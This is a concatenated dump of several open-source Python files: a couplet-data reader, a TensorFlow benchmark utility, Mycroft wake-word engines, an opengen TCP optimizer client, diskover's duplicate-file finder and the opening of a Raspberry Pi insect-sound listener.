batch['target_seq_len'].append(item['target_seq_len'])
if self.padding: # 填充
batch['in_seq'] = padding_seq(batch['in_seq'])
batch['target_seq'] = padding_seq(batch['target_seq'])
yield batch
# 初始化文件读取,将训练集读取,处理,存入data列表
def _init_reader(self):
self.data = []
input_f = open(self.input_file, 'rb')
target_f = open(self.target_file, 'rb')
for input_line in input_f:
input_line = input_line.decode('utf-8')[:-1] # 上联
input_words = [x for x in input_line.split(' ') if x != ''] # 上联包含的汉字列表
if len(input_words) >= self.max_len: # 如果上联太长,缩短
input_words = input_words[:self.max_len - 1]
input_words.append(self.end_token) # 增加结束标志
target_line = target_f.readline().decode('utf-8')[:-1] # 对应下联
target_words = [x for x in target_line.split(' ') if x != ''] # 下联包含的汉字列表
if len(target_words) >= self.max_len: # 如果下联太长,缩短
target_words = target_words[:self.max_len - 1]
target_words = ['<s>', ] + target_words
target_words.append(self.end_token)
in_seq = encode_text(input_words, self.vocab_indices) # 获取上联各字在字典中的位置
target_seq = encode_text(target_words, self.vocab_indices) # 获取下联各字在字典中的位置
self.data.append({ # 添加一条对联记录
'in_seq': in_seq,
'in_seq_len': len(in_seq),
'target_seq': target_seq,
'target_seq_len': len(target_seq) - 1
})
input_f.close()
target_f.close()
self.data_pos = len(self.data)
|
cnn_util.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for CNN benchmarks."""
from __future__ import print_function
import sys
import threading
import tensorflow as tf
tf.flags.DEFINE_boolean('use_python32_barrier', False,
"""When on, use threading.Barrier at python 3.2.""")
tf.flags.DEFINE_boolean('flush_stdout', False,
"""When on, flush stdout everytime log_fn is called.""")
FLAGS = tf.flags.FLAGS
def tensorflow_version_tuple():
v = tf.__version__
major, minor, patch = v.split('.')
return (int(major), int(minor), patch)
def tensorflow_version():
vt = tensorflow_version_tuple()
return vt[0] * 1000 + vt[1]
def log_fn(log):
print(log)
if FLAGS.flush_stdout:
sys.stdout.flush()
# For Python 2.7 compatibility, we do not use threading.Barrier.
class Barrier(object):
"""Implements a lightweight Barrier.
Useful for synchronizing a fixed number of threads at known synchronization
points. Threads block on 'wait()' and simultaneously return once they have
all made that call.
# Implementaion adpoted from boost/thread/barrier.hpp
"""
def __init__(self, parties):
"""Create a barrier, initialised to 'parties' threads."""
self.cond = threading.Condition(threading.Lock())
self.parties = parties
# Indicates the number of waiting parties.
self.waiting = 0
# generation is needed to deal with spurious wakeups. If self.cond.wait()
# wakes up for other reasons, generation will force it go back to wait().
self.generation = 0
self.broken = False
def wait(self):
"""Wait for the barrier."""
with self.cond:
# Check if the barrier has been disabled or not.
if self.broken:
return
gen = self.generation
self.waiting += 1
if self.waiting == self.parties:
self.waiting = 0
self.generation += 1
self.cond.notify_all()
# loop because of spurious wakeups
while gen == self.generation:
self.cond.wait()
# TODO(huangyp): Remove this method once we find a way to know which step
# is the last barrier.
def abort(self):
"""Clear existing barrier and disable this barrier."""
with self.cond:
if self.waiting > 0:
self.generation += 1
self.cond.notify_all()
self.broken = True
class ImageProducer(object):
"""An image producer that puts images into a staging area periodically.
This class is useful for periodically running a set of ops, `put_ops` on a
different thread every `batch_group_size` times.
The notify_image_consumption() method is used to increment an internal counter
so that when it is first called, `put_ops` is executed. Afterwards, every
`batch_group_size` times notify_image_consumption() is called,
`put_ops` is executed again. A barrier is placed so that the main thread is
blocked until `put_ops` have been executed.
The start() method is used to start the thread that runs `put_ops`.
The done() method waits until the last put_ops is executed and stops the
thread.
The purpose of this class is to fill an image input pipeline every
`batch_group_size` steps. Suppose `put_ops` supplies M images to the input
pipeline when run, and that every step, (M/`batch_group_size`) images are
consumed. Then, by calling notify_image_consumption() every step, images are
supplied to the input pipeline at the same amount they are consumed.
"""
def __init__(self, sess, put_ops, batch_group_size):
self.sess = sess
self.num_gets = 0
self.put_ops = put_ops
self.batch_group_size = batch_group_size
self.done_event = threading.Event()
if (FLAGS.use_python32_barrier and
sys.version_info[0] == 3 and sys.version_info[1] >= 2):
self.put_barrier = threading.Barrier(2)
else:
self.put_barrier = Barrier(2)
def _should_put(self):
return self.num_gets % self.batch_group_size == 0
def done(self):
"""Stop the image producer."""
self.done_event.set()
self.put_barrier.abort()
self.thread.join()
def start(self):
"""Start the image producer."""
self.thread = threading.Thread(target=self._loop_producer)
# Set daemon to true to allow Ctrl + C to terminate all threads.
self.thread.daemon = True
self.thread.start()
def notify_image_consumption(self):
"""Increment the counter of image_producer by 1.
This should only be called by the main thread that consumes images and runs
the model computation.
"""
if self._should_put():
self.put_barrier.wait()
self.num_gets += 1
def _loop_producer(self):
while not self.done_event.isSet():
self.sess.run([self.put_ops])
self.put_barrier.wait()
|
hotword_factory.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
from time import sleep
import os
import platform
import posixpath
import tempfile
import requests
from contextlib import suppress
from glob import glob
from os.path import dirname, exists, join, abspath, expanduser, isfile, isdir
from petact import install_package
from shutil import rmtree
from threading import Timer, Event, Thread
from urllib.error import HTTPError
from mycroft.configuration import Configuration, LocalConf, USER_CONFIG
from mycroft.util.log import LOG
RECOGNIZER_DIR = join(abspath(dirname(__file__)), "recognizer")
INIT_TIMEOUT = 10 # In seconds
class TriggerReload(Exception):
pass
class NoModelAvailable(Exception):
pass
class HotWordEngine:
def __init__(self, key_phrase="hey boss", config=None, lang="en-us"):
self.key_phrase = str(key_phrase).lower()
# rough estimate 1 phoneme per 2 chars
self.num_phonemes = len(key_phrase) / 2 + 1
if config is None:
config = Configuration.get().get("hot_words", {})
config = config.get(self.key_phrase, {})
self.config = config
self.listener_config = Configuration.get().get("listener", {})
self.lang = str(self.config.get("lang", lang)).lower()
def found_wake_word(self, frame_data):
return False
def update(self, chunk):
pass
def stop(self):
""" Perform any actions needed to shut down the hot word engine.
This may include things such as unload loaded data or shutdown
external processess.
"""
pass
class PocketsphinxHotWord(HotWordEngine):
def __init__(self, key_phrase="hey boss", config=None, lang="en-us"):
super(PocketsphinxHotWord, self).__init__(key_phrase, config, lang)
# Hotword module imports
from pocketsphinx import Decoder
# Hotword module params
self.phonemes = self.config.get("phonemes", "HH EY . M AY K R AO F T")
self.num_phonemes = len(self.phonemes.split())
self.threshold = self.config.get("threshold", 1e-90)
self.sample_rate = self.listener_config.get("sample_rate", 1600)
dict_name = self.create_dict(self.key_phrase, self.phonemes)
config = self.create_config(dict_name, Decoder.default_config())
self.decoder = Decoder(config)
def create_dict(self, key_phrase, phonemes):
(fd, file_name) = tempfile.mkstemp()
words = key_phrase.split()
phoneme_groups = phonemes.split('.')
with os.fdopen(fd, 'w') as f:
for word, phoneme in zip(words, phoneme_groups):
f.write(word + ' ' + phoneme + '\n')
return file_name
def create_config(self, dict_name, config):
model_file = join(RECOGNIZER_DIR, 'model', self.lang, 'hmm')
if not exists(model_file):
LOG.error('PocketSphinx model not found at ' + str(model_file))
config.set_string('-hmm', model_file)
config.set_string('-dict', dict_name)
config.set_string('-keyphrase', self.key_phrase)
config.set_float('-kws_threshold', float(self.threshold))
config.set_float('-samprate', self.sample_rate)
config.set_int('-nfft', 2048)
config.set_string('-logfn', '/dev/null')
return config
def transcribe(self, byte_data, metrics=None):
start = time.time()
self.decoder.start_utt()
self.decoder.process_raw(byte_data, False, False)
self.decoder.end_utt()
if metrics:
metrics.timer("mycroft.stt.local.time_s", time.time() - start)
return self.decoder.hyp()
def found_wake_word(self, frame_data):
hyp = self.transcribe(frame_data)
return hyp and self.key_phrase in hyp.hypstr.lower()
class PreciseHotword(HotWordEngine):
def __init__(self, key_phrase="hey boss", config=None, lang="en-us"):
super(PreciseHotword, self).__init__(key_phrase, config, lang)
from precise_runner import (
PreciseRunner, PreciseEngine, ReadWriteStream
)
local_conf = LocalConf(USER_CONFIG)
if local_conf.get('precise', {}).get('dist_url') == \
'http://bootstrap.mycroft.ai/artifacts/static/daily/':
del local_conf['precise']['dist_url']
local_conf.store()
Configuration.updated(None)
self.download_complete = True
self.show_download_progress = Timer(0, lambda: None)
precise_config = Configuration.get()['precise']
precise_exe = self.install_exe(precise_config['dist_url'])
local_model = self.config.get('local_model_file')
if local_model:
self.precise_model = expanduser(local_model)
else:
self.precise_model = self.install_model(
precise_config['model_url'], key_phrase.replace(' ', '-')
).replace('.tar.gz', '.pb')
self.has_found = False
self.stream = ReadWriteStream()
def on_activation():
self.has_found = True
trigger_level = self.config.get('trigger_level', 3)
sensitivity = self.config.get('sensitivity', 0.5)
self.runner = PreciseRunner(
PreciseEngine(precise_exe, self.precise_model),
trigger_level, sensitivity,
stream=self.stream, on_activation=on_activation,
)
self.runner.start()
@property
def folder(self):
return join(expanduser('~'), '.mycroft', 'precise')
def install_exe(self, url: str) -> str:
url = url.format(arch=platform.machine())
if not url.endswith('.tar.gz'):
url = requests.get(url).text.strip()
if install_package(
url, self.folder,
on_download=self.on_download, on_complete=self.on_complete
):
raise TriggerReload
return join(self.folder, 'precise-engine', 'precise-engine')
def install_model(self, url: str, wake_word: str) -> str:
model_url = url.format(wake_word=wake_word)
model_file = join(self.folder, posixpath.basename(model_url))
try:
install_package(
model_url, self.folder,
on_download=lambda: LOG.info('Updated precise model')
)
except (HTTPError, ValueError):
if isfile(model_file):
LOG.info("Couldn't find remote model. Using local file")
else:
raise NoModelAvailable('Failed to download model:', model_url)
return model_file
@staticmethod
def _snd_msg(cmd):
with suppress(OSError):
with open('/dev/ttyAMA0', 'w') as f:
print(cmd, file=f)
def on_download(self):
LOG.info('Downloading Precise executable...')
if isdir(join(self.folder, 'precise-stream')):
rmtree(join(self.folder, 'precise-stream'))
for old_package in glob(join(self.folder, 'precise-engine_*.tar.gz')):
os.remove(old_package)
self.download_complete = False
self.show_download_progress = Timer(
5, self.during_download, args=[True]
)
self.show_download_progress.start()
def during_download(self, first_run=False):
LOG.info('Still downloading executable...')
if first_run: # TODO: Localize
self._snd_msg('mouth.text=Updating listener...')
if not self.download_complete:
self.show_download_progress = Timer(30, self.during_download)
self.show_download_progress.start()
def on_complete(self):
LOG.info('Precise download complete!')
self.download_complete = True
self.show_download_progress.cancel()
self._snd_msg('mouth.reset')
def update(self, chunk):
self.stream.write(chunk)
def found_wake_word(self, frame_data):
if self.has_found:
self.has_found = False
return True
return False
def stop(self):
if self.runner:
self.runner.stop()
class SnowboyHotWord(HotWordEngine):
def __init__(self, key_phrase="hey boss", config=None, lang="en-us"):
super(SnowboyHotWord, self).__init__(key_phrase, config, lang)
# Hotword module imports
from snowboydecoder import HotwordDetector
# Hotword module config
module = self.config.get("module")
if module != "snowboy":
LOG.warning(module + " module does not match with Hotword class "
"snowboy")
# Hotword params
models = self.config.get("models", {})
paths = []
for key in models:
paths.append(models[key])
sensitivity = self.config.get("sensitivity", 0.5)
self.snowboy = HotwordDetector(paths,
sensitivity=[sensitivity] * len(paths))
self.lang = str(lang).lower()
self.key_phrase = str(key_phrase).lower()
def found_wake_word(self, frame_data):
wake_word = self.snowboy.detector.RunDetection(frame_data)
return wake_word == 1
class HotWordFactory:
CLASSES = {
"pocketsphinx": PocketsphinxHotWord,
"precise": PreciseHotword,
"snowboy": SnowboyHotWord
}
@staticmethod
def load_module(module, hotword, config, lang, loop):
LOG.info('Loading "{}" wake word via {}'.format(hotword, module))
instance = None
complete = Event()
def initialize():
nonlocal instance, complete
try:
clazz = HotWordFactory.CLASSES[module]
instance = clazz(hotword, config, lang=lang)
except TriggerReload:
complete.set()
sleep(0.5)
loop.reload()
except NoModelAvailable:
LOG.warning('Could not found find model for {} on {}.'.format(
hotword, module
))
instance = None
except Exception:
LOG.exception(
'Could not create hotword. Falling back to default.')
instance = None
complete.set()
Thread(target=initialize, daemon=True).start()
if not complete.wait(INIT_TIMEOUT):
LOG.info('{} is taking too long to load'.format(module))
complete.set()
return instance
@classmethod
def create_hotword(cls, hotword="hey boss", config=None,
lang="en-us", loop=None):
if not config:
config = Configuration.get()['hotwords']
config = config[hotword]
module = config.get("module", "precise")
return cls.load_module(module, hotword, config, lang, loop) or \
cls.load_module('pocketsphinx', hotword, config, lang, loop) or \
cls.CLASSES['pocketsphinx']()
|
optimizer_tcp_manager.py
|
import yaml
import os
import subprocess
import socket
import json
import logging
import time
import math
import pkg_resources
from threading import Thread
from retry import retry
from .solver_response import SolverResponse
class OptimizerTcpManager:
"""Client for TCP interface of parametric optimizers
This class is used to start and stop a TCP server, which
has been generated by <code>opengen</code>.
"""
def __init__(self, optimizer_path=None, ip=None, port=None):
"""
Constructs instance of <code>OptimizerTcpManager</code>
There are three ways to use this constructor:
- OptimizerTcpManager(optimizer_path): creates a TCP manager for a local
TCP server using the default IP and port of that TCP server (specified
upon code generation)
- OptimizerTcpManager(optimizer_path, ip, port): creates a TCP manager
for a local TCP server, but overrides the default IP and port. This way
the user can set the address '0.0.0.0', so that the TCP server binds on
all IPs, or '127.0.0.1' so that it is accessible only locally, or a VPN
IP address, so that the optimizer is accessible only over a private
network.
- OptimizerTcpManager(ip, port): If a path is not provided, then the
TCP manager can be used to connect to a remote TCP server, as a client,
but cannot be used to start the server.
Args:
:param optimizer_path:
path to auto-generated optimizer (just to be clear: this is
the folder that contains <code>optimizer.yml</code>)
:param ip:
the user can provide the IP of a remote TCP server (must be up and
running) so as to establish a remote connection. In that case `path`
must be equal to `None` (see examples above)
:param port: see ip
Returns:
New instance of <code>OptimizerTcpManager</code>
"""
self.__optimizer_path = optimizer_path
if optimizer_path is not None:
self.__optimizer_details = None # create attribute (including IP and port)
self.__load_tcp_details()
if ip is not None:
self.__optimizer_details['tcp']['ip'] = ip
if port is not None:
self.__optimizer_details['tcp']['port'] = port
# Check whether the optimizer was built with the current version of opengen
# We can only check the optimizer version if the optimizer runs locally
opengen_version = self.__optimizer_details['build']['opengen_version']
current_opengen_version = pkg_resources.require("opengen")[0].version
if current_opengen_version != opengen_version:
logging.warn(
'the target optimizer was build with a different version of opengen (%s)' % opengen_version)
logging.warn('you are running opengen version %s' % current_opengen_version)
elif ip is not None and port is not None:
self.__optimizer_details = {"tcp": {"ip": ip, "port": port}}
else:
# If the optimizer path has not been provided, both the IP and and the
# port must be provided, otherwise, raise an exception
raise Exception("Illegal arguments")
logging.info("TCP/IP details: %s:%d",
self.__optimizer_details['tcp']['ip'],
self.__optimizer_details['tcp']['port'])
def __load_tcp_details(self):
yaml_file = os.path.join(self.__optimizer_path, "optimizer.yml")
with open(yaml_file, 'r') as stream:
self.__optimizer_details = yaml.safe_load(stream)
@retry(tries=10, delay=1)
def __obtain_socket_connection(self):
tcp_data = self.__optimizer_details
ip = tcp_data['tcp']['ip']
port = tcp_data['tcp']['port']
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.connect((ip, port))
return s
def __send_receive_data(self, text_to_send, buffer_size=512, max_data_size=1048576):
conn_socket = self.__obtain_socket_connection()
encoded_data = text_to_send.encode()
conn_socket.sendall(encoded_data)
conn_socket.shutdown(socket.SHUT_WR)
max_read_rounds = math.ceil(max_data_size/buffer_size)
data = b''
for _i in range(max_read_rounds):
data_chunk = conn_socket.recv(buffer_size)
if data_chunk is None:
break
data += data_chunk
conn_socket.close()
return data.decode()
def ping(self):
"""Pings the server
Pings the server to check whether it is up and running
"""
request = '{"Ping":1}'
data = self.__send_receive_data(request)
return json.loads(data)
def __check_if_server_is_running(self):
tcp_data = self.__optimizer_details
ip = tcp_data['tcp']['ip']
port = tcp_data['tcp']['port']
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
return 0 == s.connect_ex((ip, port))
@property
def details(self):
return self.__optimizer_details
def start(self):
"""Starts the TCP server
Note: this method starts a *local* server whose path must have been
provided - we cannot start a remote server.
The server starts on a separate thread, so this method does not block
the execution of the caller's programme.
"""
# Check if a path has been provided; if not,
if self.__optimizer_path is None:
raise Exception("No optimizer path provided - cannot start a remote server")
# Server start data
tcp_data = self.__optimizer_details
ip = tcp_data['tcp']['ip']
port = tcp_data['tcp']['port']
# Check if any of the ip/port pairs is occupied
if self.__check_if_server_is_running():
msg = "Port %d not available" % port
raise Exception(msg)
def threaded_start():
optimizer_details = self.__optimizer_details
logging.info("Starting TCP/IP server at %s:%d (in a detached thread)",
ip, port)
command = ['cargo', 'run', '-q']
command += ["--release"] if optimizer_details['build']['build_mode'] == 'release' else []
command += ['--', '--port=%d' % port, '--ip=%s' % ip]
tcp_dir_name = "tcp_iface_" + optimizer_details['meta']['optimizer_name']
tcp_iface_directory = os.path.join(self.__optimizer_path, tcp_dir_name)
p = subprocess.Popen(command, cwd=tcp_iface_directory)
p.wait()
# start the server in a separate thread
logging.info("Starting TCP/IP server thread")
thread = Thread(target=threaded_start)
thread.start()
# ping the server until it responds so that we know it's
# up and running
logging.info("Waiting for server to start")
time.sleep(0.1)
self.ping()
def kill(self):
"""Kills the server"""
logging.info("Killing server")
request = '{"Kill":1}'
self.__send_receive_data(request)
def call(self, p, initial_guess=None,
initial_y=None,
initial_penalty=None,
buffer_len=4096,
max_data_size=1048576) -> SolverResponse:
"""Calls the server
Consumes the parametric optimizer by providing a parameter vector
and, optionally, an initial guess
Args:
p: vector of parameters (list of float)
initial_guess: initial guess vector (list of float)
initial_y: initial vector of Lagrange multipliers (list of float)
initial_penalty: initial penalty parameter (float)
buffer_len: buffer length used to read the server response
(default value: 4096)
max_data_size: maximum data size that is expected to be
received from the TCP server (default value: 1048576)
Returns:
Instance of SolverResponse
"""
# Make request
logging.debug("Sending request to TCP/IP server")
run_message = '{"Run" : {"parameter": ['
run_message += ','.join(map(str, p))
run_message += ']'
if initial_guess is not None:
run_message += ', "initial_guess": ['
run_message += ','.join(map(str, initial_guess))
run_message += ']'
if initial_y is not None:
run_message += ', "initial_lagrange_multipliers": ['
run_message += ','.join(map(str, initial_y))
run_message += ']'
if initial_penalty is not None:
run_message += ', "initial_penalty": ' + str(float(initial_penalty))
run_message += '}}'
data = self.__send_receive_data(run_message, buffer_len, max_data_size)
return SolverResponse(json.loads(data))
|
diskover_dupes.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that index's
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2019
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from diskover import index_bulk_add, config, es, progress_bar, redis_conn, worker_bots_busy, ab_start, adaptive_batch
from diskover_bot_module import dupes_process_hashkey
from rq import SimpleWorker
import base64
import hashlib
import os
import time
import warnings
import dateutil.parser
try:
from Queue import Queue as pyQueue
except ImportError:
from queue import Queue as pyQueue
from threading import Thread
from multiprocessing import cpu_count
def index_dupes(hashgroup, cliargs):
"""This is the ES dupe_md5 tag update function.
It updates a file's dupe_md5 field to be md5sum of file
if it's marked as a duplicate.
"""
file_id_list = []
# bulk update data in Elasticsearch index
for f in hashgroup['files']:
d = {
'_op_type': 'update',
'_index': cliargs['index'],
'_type': 'file',
'_id': f['id'],
'doc': {'dupe_md5': hashgroup['md5sum']}
}
file_id_list.append(d)
if len(file_id_list) > 0:
index_bulk_add(es, file_id_list, config, cliargs)
def start_file_threads():
for i in range(config['dupes_threads']):
thread = Thread(target=md5_hasher)
thread.daemon = True
thread.start()
def md5_hasher():
while True:
item = file_in_thread_q.get()
filename, atime, mtime, cliargs = item
# get md5 sum, don't load whole file into memory,
# load in n bytes at a time (read_size blocksize)
try:
read_size = config['md5_readsize']
hasher = hashlib.md5()
with open(filename, 'rb') as f:
buf = f.read(read_size)
while len(buf) > 0:
hasher.update(buf)
buf = f.read(read_size)
md5 = hasher.hexdigest()
# restore times (atime/mtime)
if config['dupes_restoretimes'] == "true":
atime_unix = dateutil.parser.isoparse(atime).timestamp()
mtime_unix = dateutil.parser.isoparse(mtime).timestamp()
try:
os.utime(filename, (atime_unix, mtime_unix))
except (OSError, IOError) as e:
warnings.warn("OS/IO Exception caused by: %s" % e)
pass
except Exception as e:
warnings.warn("Exception caused by: %s" % e)
pass
except (OSError, IOError) as e:
warnings.warn("OS/IO Exception caused by: %s" % e)
file_in_thread_q.task_done()
continue
except Exception as e:
warnings.warn("Exception caused by: %s" % e)
file_in_thread_q.task_done()
continue
file_out_thread_q.put((filename, md5))
file_in_thread_q.task_done()
def verify_dupes(hashgroup, cliargs):
"""This is the verify dupes function.
It processes files in hashgroup to verify if they are duplicate.
The first few bytes at beginning and end of files are
compared and if same, a md5 check is run on the files.
If the files are duplicate, their dupe_md5 field
is updated to their md5sum.
Returns hashgroup.
"""
# number of bytes to check at start and end of file
read_bytes = config['dupes_checkbytes']
# min bytes to read of file size less than above
min_read_bytes = 1
# Add first and last few bytes for each file to dictionary
# create a new dictionary with files that have same byte hash
hashgroup_bytes = {}
for file in hashgroup['files']:
try:
f = open(file['filename'], 'rb')
except (OSError, IOError) as e:
warnings.warn("OS/IO Exception caused by: %s" % e)
continue
except Exception as e:
warnings.warn("Exception caused by: %s" % e)
continue
# check if files is only 1 byte
try:
bytes_f = base64.b64encode(f.read(read_bytes))
except (IOError, OSError):
pass
try:
bytes_f = base64.b64encode(f.read(min_read_bytes))
except Exception as e:
warnings.warn("Exception caused by: %s" % e)
continue
try:
f.seek(-read_bytes, os.SEEK_END)
bytes_l = base64.b64encode(f.read(read_bytes))
except (IOError, OSError):
pass
try:
f.seek(-min_read_bytes, os.SEEK_END)
bytes_l = base64.b64encode(f.read(min_read_bytes))
except Exception as e:
warnings.warn("Exception caused by: %s" % e)
continue
f.close()
# restore times (atime/mtime)
if config['dupes_restoretimes'] == "true":
atime_unix = dateutil.parser.isoparse(file['atime']).timestamp()
mtime_unix = dateutil.parser.isoparse(file['mtime']).timestamp()
try:
os.utime(file['filename'], (atime_unix, mtime_unix))
except (OSError, IOError) as e:
warnings.warn("OS/IO Exception caused by: %s" % e)
pass
except Exception as e:
warnings.warn("Exception caused by: %s" % e)
pass
# create hash of bytes
bytestring = str(bytes_f) + str(bytes_l)
bytehash = hashlib.md5(bytestring.encode('utf-8')).hexdigest()
# create new key for each bytehash and
# set value as new list and add file
hashgroup_bytes.setdefault(bytehash, []).append((file['filename'], file['atime'], file['mtime']))
# remove any bytehash key that only has 1 item (no duplicate)
for key, value in list(hashgroup_bytes.items()):
if len(value) < 2:
filename = value[0][0]
del hashgroup_bytes[key]
# remove file from hashgroup
for i in range(len(hashgroup['files'])):
if hashgroup['files'][i]['filename'] == filename:
del hashgroup['files'][i]
break
# run md5 sum check if bytes were same
hashgroup_md5 = {}
# do md5 check on files with same byte hashes
for key, value in list(hashgroup_bytes.items()):
for file in value:
filename, atime, mtime = file
# add file into thread queue
file_in_thread_q.put((filename, atime, mtime, cliargs))
# wait for threads to finish
file_in_thread_q.join()
# get all files and add to tree_files
while file_out_thread_q.qsize():
item = file_out_thread_q.get()
filename, md5 = item
# create new key for each md5 sum and set value as new list and
# add file
hashgroup_md5.setdefault(md5, []).append(filename)
# remove any md5sum key that only has 1 item (no duplicate)
for key, value in list(hashgroup_md5.items()):
if len(value) < 2:
filename = value[0]
del hashgroup_md5[key]
# remove file from hashgroup
for i in range(len(hashgroup['files'])):
if hashgroup['files'][i]['filename'] == filename:
del hashgroup['files'][i]
break
else:
md5 = key
if len(hashgroup['files']) >= 2:
# update hashgroup's md5sum key
hashgroup['md5sum'] = md5
return hashgroup
else:
return None
def populate_hashgroup(key, cliargs):
"""Searches ES for all files matching hashgroup key (filehash)
and returns dict containing matching files.
Return None if only 1 file matching.
"""
hashgroup_files = []
data = {
"_source": ["path_parent", "filename", "last_access", "last_modified"],
"query": {
"bool": {
"must": {
"term": {"filehash": key}
}
}
}
}
res = es.search(index=cliargs['index'], doc_type="file", size="1000", body=data,
request_timeout=config['es_timeout'])
# return None if only 1 matching file
if len(res['hits']['hits']) == 1:
return None
# add any hits to hashgroups
for hit in res['hits']['hits']:
hashgroup_files.append(
{'id': hit['_id'],
'filename': hit['_source']['path_parent'] + "/" + hit['_source']['filename'],
'atime': hit['_source']['last_access'],
'mtime': hit['_source']['last_modified']})
# return filehash group and add to queue
fhg = {'filehash': key, 'files': hashgroup_files, 'md5sum': ''}
return fhg
def dupes_finder(es, q, cliargs, logger):
"""This is the duplicate file finder function.
It searches Elasticsearch for files that have the same filehashes
and adds file hash groups to Queue.
"""
logger.info('Searching %s for all duplicate files...', cliargs['index'])
if cliargs['adaptivebatch']:
batchsize = ab_start
else:
batchsize = cliargs['batchsize']
if cliargs['verbose'] or cliargs['debug']:
logger.info('Batch size: %s' % batchsize)
# first get all the filehashes with files that have a hardlinks count of 1
data = {
"size": 0,
"query": {
"bool": {
"must": {
"term": {"hardlinks": 1}
},
"filter": {
"range": {
"filesize": {
"lte": config['dupes_maxsize'],
"gte": cliargs['minsize']
}
}
}
}
}
}
# refresh index
es.indices.refresh(index=cliargs['index'])
# search es and start scroll
res = es.search(index=cliargs['index'], scroll='1m', doc_type='file', size=config['es_scrollsize'],
body=data, request_timeout=config['es_timeout'])
filehashlist = []
filehashcount = 0
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
filehash = hit['_source']['filehash']
if filehash not in filehashlist:
filehashlist.append(filehash)
filehashcount += 1
filehashlist_len = len(filehashlist)
if filehashlist_len >= batchsize:
# send to rq for bots to process file hashkey list
q.enqueue(dupes_process_hashkey, args=(filehashlist, cliargs,), result_ttl=config['redis_ttl'])
if cliargs['debug'] or cliargs['verbose']:
logger.info("enqueued batchsize: %s (batchsize: %s)" % (filehashlist_len, batchsize))
del filehashlist[:]
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q, cliargs, batchsize)
if cliargs['debug'] or cliargs['verbose']:
logger.info("batchsize set to: %s" % batchsize)
# use es scroll api
res = es.scroll(scroll_id=res['_scroll_id'], scroll='1m',
request_timeout=config['es_timeout'])
# enqueue dir calc job for any remaining in dirlist
if len(filehashlist) > 0:
q.enqueue(dupes_process_hashkey, args=(filehashlist, cliargs,), result_ttl=config['redis_ttl'])
logger.info('%s file hashes have been enqueued' % filehashcount)
if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']:
bar = progress_bar('Checking')
bar.start()
else:
bar = None
# update progress bar until bots are idle and queue is empty
while worker_bots_busy([q]):
if bar:
q_len = len(q)
try:
bar.update(q_len)
except (ZeroDivisionError, ValueError):
bar.update(0)
time.sleep(1)
if bar:
bar.finish()
# set up python Queue for threaded file md5 checking
file_in_thread_q = pyQueue()
file_out_thread_q = pyQueue()
start_file_threads()
|
listener.py
|
#! /usr/bin/env python3
"""
This is the main pi module. Only works on a raspberry pi (4).
usage: python3 listener.py [-h] [--dirpath DIRPATH] [--modelpath MODELPATH]
[--tokenfile TOKENFILE] [--permanent PERMANENT]
[--server_url SERVER_URL] [--threshold THRESHOLD]
[--device DEVICE] [--target_rate TARGET_RATE]
[--rec_rate REC_RATE] [--samples SAMPLES]
[--buffer_size BUFFER_SIZE] [--address ADDRESS]
[--use_sensor USE_SENSOR]
optional arguments:
-h, --help show this help message and exit
--dirpath DIRPATH Verzeichnis in dem die Dateien abgespeichert
werden.(Wird nur benutzt wenn die permanent FLAG
gesetzt ist, ansonsten wird auf eine RAM-DISK
geschrieben und die Dateien nach dem Absenden
gelöscht.
--modelpath MODELPATH
Pfad an dem das Modell und die zugehörige JSON
abgespeichert ist.
--tokenfile TOKENFILE
Name des Tokenfiles des Sensors.
--permanent PERMANENT
Gibt an ob die Daten permanent gespeichert werden oder
nach dem Senden gelöscht werden.
--server_url SERVER_URL
URL des InsectCounter Projekts, e.g.
https://insectcounter.zapto.org oder
http://localhost:3000 wenn der Server lokal läuft
--threshold THRESHOLD
Kleinster RMS um die Aufnahme zu starten.
--device DEVICE Port des Audio Devices.
--target_rate TARGET_RATE
Samplespeed in Hz des Ausgabe Files.
--rec_rate REC_RATE Samplespeed in Hz der eingehenden Aufname.
--samples SAMPLES Anzahl an Samples in einer Aufnahme.
--buffer_size BUFFER_SIZE
Größe des Buffer.
--address ADDRESS Adresse des BME280.
--use_sensor USE_SENSOR
Gibt an ob der BME280 Sensor benutzt werden soll.
"""
import os
import argparse
from multiprocessing import Process
from watchdog.events import PatternMatchingEventHandler
from watchdog.observers import Observer
from classifier.network import NetworkModule
from classifier.classifier import ClassifierModule
from recording.recorder import Recorder
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
class Listener(PatternMatchingEventHandler):
"""
Class that can react to new files being generated in the file system.
"""
def __init__(self, args, patterns=None, ignore_patterns=None,
ignore_directories=False, case_sensitive=False):
"""
Constructs a listener that reacts to new wav files being created.
:param args: An argparse object containing the relevant paths.
"""
super().__init__(patterns=["*.wav"], ignore_patterns=None, ignore_directories=False, case_sensitive=False)
# Create the classifier module
self.clf = ClassifierModule(args.dirpath, args.modelpath, args.permanent)
# Create the network module
self.nw = NetworkModule(args.dirpath, args.tokenfile, args.server_url)
def process(self, event):
"""
